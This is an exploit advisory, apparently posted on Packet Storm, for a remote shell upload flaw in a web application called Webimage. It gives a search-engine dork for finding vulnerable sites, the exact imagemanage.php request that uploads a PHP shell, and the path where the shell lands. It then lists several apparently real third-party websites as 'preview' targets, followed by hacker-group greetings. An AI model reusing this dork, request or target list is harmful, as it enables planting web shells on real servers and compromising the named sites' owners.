Webimage suffers from a remote shell upload vulnerability.
015a2f33f34ab7e685c2db912e07f1fdbf1ee7ed138dbe21c78397ba8cf6fb15#########################################################
# Title : Webimage Remote file inclusion
# Author : Ryuzaki Lawlet
# Blog : justryuz.blogspot.com / www.justryuz.com
# E-mail : ryuzaki_l@y7mail.com / justryuz@facebook.com / justryuz@linuxmail.org
# Date: Sat Jan 5/2013 (6.44 pm)
# Vendor: -
# Type : Web Apps
# Tested on : Ubuntu / Window XP
# Dork : inurl:/webimage/imagemanage.php & inurl:/webimage/
##########################################################
---->
Exploit
http://localhost/webimage/
0r
http://localhost/path/webimage/imagemane.php??wz_apg=&wz_imgmode=write&editobj_name=
Upload your shell xD...
your shell path/directory at
http://localhost/webimage/upimages/
your file/shell save name php.save
example http://localhost/webimage/upimages/1357379114.php.save
---->
Preview site
http://banner.outsourcing21.com/ams/webimage/
http://www.happylasek.com/webimage/
http://www.gdsilver.co.kr/webimage/
Screenshot
http://i.imgur.com/gbZ8X.png
<!----
#==================================================<Greet>==================================================#
# Sbkiller * Xay * HeavenSe7en * Lonely * Skiddo * Ben * DzDzul * Sykes * RedJohn * LodVViP * PhiberOptick #
# KedAns-Dz * r0073r * Sid3^effectS * r4dc0re (1337day.com) * CrosS (r00tw0rm.com) * NuxbieCyber ..all #
# CyberSec Crew * Cyber 4rmy * T3D Hacker * DevilSec * RileksCrew * TBD * Newbie3vilc063rs * MyHex * GaySec #
# www.1337day.com /.net /.org * packetstormsecurity.org * cxsecurity * All Security and Exploits #
#===========================================================================================================#
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed